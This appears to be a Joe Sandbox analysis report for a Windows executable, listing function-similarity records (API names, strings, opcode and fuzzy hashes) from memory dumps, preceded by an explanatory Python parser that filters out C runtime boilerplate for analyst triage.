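The record above is the first one in this run of Similarity blocks whose API list survived extraction (InitializeCriticalSection, CreateSemaphoreW, CreateEventW next to the string "Thread pool initialization failed."), while most of its neighbours are Microsoft CRT internals (_invalid_parameter_noinfo, _set_statfp, the "csm" C++ exception-handling magic, the CorExitProcess/mscoree.dll check in the CRT exit path). The following parser is an added example, not Joe Sandbox code: it turns these "• Key: Value" records into structured objects and separates CRT boilerplate from sample-specific functions so an analyst can skip the noise. The embedded input is constructed from the fields of four records on this page, trimmed to what the parser needs; the CRT marker lists are a heuristic assumption of this example, not a Joe Sandbox classification.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: four records copied from the Similarity blocks on this page,
# trimmed to the fields the parser needs. Each record begins at an "APIs" header line.
SAMPLE_REPORT = """\
APIs
• InitializeCriticalSection.KERNEL32(?,?,?,00007FF6CA9E317F,?,?,00001000,00007FF6CA9CE51D), ref: 00007FF6CA9DE8BB
• CreateSemaphoreW.KERNEL32(?,?,?,00007FF6CA9E317F,?,?,00001000,00007FF6CA9CE51D), ref: 00007FF6CA9DE8CB
• CreateEventW.KERNEL32(?,?,?,00007FF6CA9E317F,?,?,00001000,00007FF6CA9CE51D), ref: 00007FF6CA9DE8E4
Strings
Memory Dump Source
• Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853
• Instruction Fuzzy Hash: FE210832E1564186F7148F65F4653AD32A1EF98B0EF188034CA8DCB286CF7E9896C784
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Instruction Fuzzy Hash: 03F06221A29A8281EF588F51F8642796360EF8C7D2F485079E98FC7665DF3CE486C700
APIs
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Instruction Fuzzy Hash: F011C436E1C68781F65409A4F67537909416F453A2F58CAB0EAFF875D6CF2CA8436105
APIs
Similarity
• API ID: CapsDeviceRelease
• String ID:
• API String ID: 127614599-3916222277
• Instruction Fuzzy Hash: 70E08C20B0864182EF685FB6B59D02A2261AB4CBD1F198135DA5F87B94DE3CC4E64300
"""

# "• Name.MODULE(args), ref: <hex address>" lines under the APIs header.
API_CALL_RE = re.compile(r"^• (?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# Every other "• Key: Value" line (Similarity fields, Source File, Snapshot File).
FIELD_RE = re.compile(r"^• (?P<key>[^:]+):\s*(?P<value>.*)$")
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Heuristic markers for MSVC CRT / C++ exception-handling internals that every MSVC-built
# binary carries. Assumption of this example, not a Joe Sandbox classification.
CRT_API_MARKERS = ("_invalid_parameter_noinfo", "_set_statfp", "__except_validate_context_record")
CRT_STRING_MARKERS = {"CorExitProcess", "mscoree.dll", "csm"}


@dataclass
class FuncRecord:
    api_calls: list = field(default_factory=list)  # (api name, module, call-site address)
    fields: dict = field(default_factory=dict)     # raw "Key: Value" pairs of the record

    @property
    def api_id(self) -> str:
        return self.fields.get("API ID", "")

    @property
    def strings(self) -> list:
        # "String ID" is a "$"-joined list; empty entries carry no information.
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    @property
    def string_hash(self) -> int:
        # "API String ID" is "<api hash>-<string hash>"; a string hash of 0 means no string refs.
        return int(self.fields.get("API String ID", "0-0").split("-")[1])


def parse_records(text: str) -> list:
    """Split the report text into FuncRecord objects, one per "APIs" header."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append(FuncRecord())
            section = "apis"
            continue
        if not records:
            continue  # text before the first record
        if line in SECTION_HEADERS:
            section = line
            continue
        call = API_CALL_RE.match(line)
        if section == "apis" and call:
            records[-1].api_calls.append((call["name"], call["module"], int(call["ref"], 16)))
            continue
        kv = FIELD_RE.match(line)
        if kv:
            records[-1].fields[kv["key"].strip()] = kv["value"].strip()
    return records


def is_crt_boilerplate(rec: FuncRecord) -> bool:
    """True when the record's API names or strings match the CRT marker lists above."""
    if any(marker in rec.api_id for marker in CRT_API_MARKERS):
        return True
    return bool(CRT_STRING_MARKERS & set(rec.strings))


def triage(text: str) -> list:
    """Records that are not CRT noise, in report order."""
    return [r for r in parse_records(text) if not is_crt_boilerplate(r)]


if __name__ == "__main__":
    for r in triage(SAMPLE_REPORT):
        calls = ", ".join(f"{n}.{m}@{addr:016X}" for n, m, addr in r.api_calls) or "(calls not listed)"
        print(f"{r.api_id:<48} strings={r.strings} calls={calls}")
```

On the four constructed records, `triage` keeps the thread-pool initialiser and the CapsDeviceRelease function and drops the CorExitProcess and _set_statfp records; extend `CRT_API_MARKERS` and `CRT_STRING_MARKERS` as further runtime functions are recognised, and treat a non-zero string hash with an empty "String ID" (as in the CapsDeviceRelease record) as a hint that the referenced strings were non-printable or not extracted.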
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CapsDeviceRelease
                                                  • String ID:
                                                  • API String ID: 127614599-3916222277
                                                  • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                  • Instruction ID: a5ebe3488c1bb7b62c3546af588fd419df35cd8c095d37fafabceabafb14d64f
                                                  • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                  • Instruction Fuzzy Hash: 70E08C20B0864182EF685FB6B59D02A2261AB4CBD1F198135DA5F87B94DE3CC4E64300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                  • String ID:
                                                  • API String ID: 1137671866-0
                                                  • Opcode ID: 580eb8bd8f76e11621dd22c3f902231a9c49c84aaab9ae48d1a37248dc949a6d
                                                  • Instruction ID: 45d94528271b1d5de597250266ca472c5b109c8b9892d50b6f1d8d8c12740b89
                                                  • Opcode Fuzzy Hash: 580eb8bd8f76e11621dd22c3f902231a9c49c84aaab9ae48d1a37248dc949a6d
                                                  • Instruction Fuzzy Hash: 74A1C662B28A9181EA10EF65F8661AD6371FF85789F405171EACDC3AEADF3CE545C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
                                                  • Opcode ID: 38f5882c6b65f2a691eaa35e16abd0289ae7d829c28f25cf5369e5845229c7f4
                                                  • Instruction ID: a74f05cf08e25790743cca206267eaea0b3d4c55b3078dee3cab122aad350251
                                                  • Opcode Fuzzy Hash: 38f5882c6b65f2a691eaa35e16abd0289ae7d829c28f25cf5369e5845229c7f4
                                                  • Instruction Fuzzy Hash: 0951D472B64A4295FB00AF75E4662EC2321FB88BD9F404275DA9CD77D7DE28D141C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                  • String ID:
                                                  • API String ID: 4141327611-0
                                                  • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                  • Instruction ID: 793fed8dd9dcaa4a572feb827cf93408100ec127c853603dc4426007031860ab
                                                  • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                  • Instruction Fuzzy Hash: 5D41D73192868246FB619E50B8663797290EF40B9AF154179FACDC7AE7CF7CD4418701
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3823481717-0
                                                  • Opcode ID: c1c548311496109c7c973564b1f0111f496352b18342627c01e39ee1156b1353
                                                  • Instruction ID: 8abdc966d0f0769b166763aeb327cd69f180b59ee8b39620d5ce23e34160cf69
                                                  • Opcode Fuzzy Hash: c1c548311496109c7c973564b1f0111f496352b18342627c01e39ee1156b1353
                                                  • Instruction Fuzzy Hash: F341B262F24B5184FB00CFB5E8961AD3371BF44B96B005275EE9DABA9ADF78D085C300
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6CA9FC45B), ref: 00007FF6CAA00B91
                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6CA9FC45B), ref: 00007FF6CAA00BF3
                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6CA9FC45B), ref: 00007FF6CAA00C2D
                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6CA9FC45B), ref: 00007FF6CAA00C57
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                  • String ID:
                                                  • API String ID: 1557788787-0
                                                  • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                  • Instruction ID: 52c11a29922396885a304bc6e54a4a972aa13419ab03e327ca48a78b88f3ff1f
                                                  • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                  • Instruction Fuzzy Hash: EF217131F19B9181E6249F52B464029B6A4FB98FD1B494174DEDFA3BA8DF3CE4538304
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCurrentErrorHandleLastOpenToken
                                                  • String ID:
                                                  • API String ID: 2767541406-0
                                                  • Opcode ID: 5654bcca214520ce5c59c20fe73351a0b2af752cbeb51540c01220f8dc932e82
                                                  • Instruction ID: 97edc6607a4dcdc18bca2e63372c68f5c16dc87f4b23522bda018c001e956205
                                                  • Opcode Fuzzy Hash: 5654bcca214520ce5c59c20fe73351a0b2af752cbeb51540c01220f8dc932e82
                                                  • Instruction Fuzzy Hash: 78118132A1CB4282E7508F61F86556A77B0FB88B81F444176EACEC3A68CF3CD146CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$abort
                                                  • String ID:
                                                  • API String ID: 1447195878-0
                                                  • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                  • Instruction ID: f3f0ad17e4661f9c92673ab16876a0aea1d4068f7ae44bb57374d081dda9b2f4
                                                  • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                  • Instruction Fuzzy Hash: 2C016910B2964642FA586FA5BE7B53821A15F487DAF0444BCE99FC37E7ED2CF8414200
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                  • Instruction ID: 77f751604cf018e9f80ef48fa0281cd894ee208dabe064b085f2ae4eb66bfaca
                                                  • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                  • Instruction Fuzzy Hash: 79E0ED60E0960282FF595FF2B86D13625A0AF88743F0885B9C85FC7391DD3CA1A68714
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: DXGIDebug.dll
                                                  • API String ID: 3668304517-540382549
                                                  • Opcode ID: a08899e38426230943dcdae29aa39143af9d13bf0e4c208fbdbfd644d4e58482
                                                  • Instruction ID: 9e916d0efed7796207ac27442cca271fd7eb9cd398b746f6f262ba14512c6ddc
                                                  • Opcode Fuzzy Hash: a08899e38426230943dcdae29aa39143af9d13bf0e4c208fbdbfd644d4e58482
                                                  • Instruction Fuzzy Hash: 3A71CC72A24B8186EB14CF25F8513ADB3A8FB54798F504235DBAD87B96DF78D0A1C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: e+000$gfff
                                                  • API String ID: 3215553584-3030954782
                                                  • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                  • Instruction ID: 2a535d69360623c55ee29c5fd0e67c7bd6b23f64519f5e4ac3638fc953a757c5
                                                  • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                  • Instruction Fuzzy Hash: DA511862B287C146E7258F35AC523AD6BA1A781B91F0C8279EADCC7BD6DF2CD444C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                  • String ID: SIZE
                                                  • API String ID: 449872665-3243624926
                                                  • Opcode ID: 3190869bd73ecd60fb0f53392e682d412e6871c3627f6ccf45194b60311ac42a
                                                  • Instruction ID: c75886457df884e1530668cbf81df12f3cb505046de89a447c2647e3f78d8fe9
                                                  • Opcode Fuzzy Hash: 3190869bd73ecd60fb0f53392e682d412e6871c3627f6ccf45194b60311ac42a
                                                  • Instruction Fuzzy Hash: 9141D566E3864285EA10EF68F4523BD6360EF95792F504271EADDC2AD7EE3CD581C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                  • String ID: C:\Users\user\Desktop\Y5kEUsYDFr.exe
                                                  • API String ID: 3307058713-2461666950
                                                  • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                  • Instruction ID: a17e70511042e791d829b8920e2c478d330a2ee63f68db8da8c5afca9c509302
                                                  • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                  • Instruction Fuzzy Hash: 2441B232A28A4286EB14DF66B8620BD7794EF44BD5B448079FD8EC7B56DE3CE442C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_snwprintf
                                                  • String ID: $%s$@%s
                                                  • API String ID: 2650857296-834177443
                                                  • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                  • Instruction ID: 6326f2151b75ba04b735f60c67257c2fb5a23c7fd3c987080ff5d5d182e12b41
                                                  • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                  • Instruction Fuzzy Hash: 7D310572B28A4685EE50DFA6F4612E923A0FB54785F400072EE8D87B96DE3CE546C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: DialogParamVisibleWindow
                                                  • String ID: GETPASSWORD1
                                                  • API String ID: 3157717868-3292211884
